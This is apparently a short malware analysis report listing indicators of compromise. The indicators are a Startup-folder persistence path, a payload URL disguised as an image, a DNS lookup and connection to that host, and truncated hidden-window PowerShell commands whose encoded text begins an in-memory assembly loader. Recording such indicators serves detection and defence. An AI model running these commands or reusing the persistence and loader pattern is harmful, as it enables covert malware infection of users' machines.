Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\<File name>.exe
- https://k.top4top.io/p_1472xh4hx1.jpg
- 'k.###4top.io':443
- DNS ASK k.###4top.io
- '<SYSTEM32>\cmd.exe' /c start /b powershell -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAG...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c start /b powershell -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAG...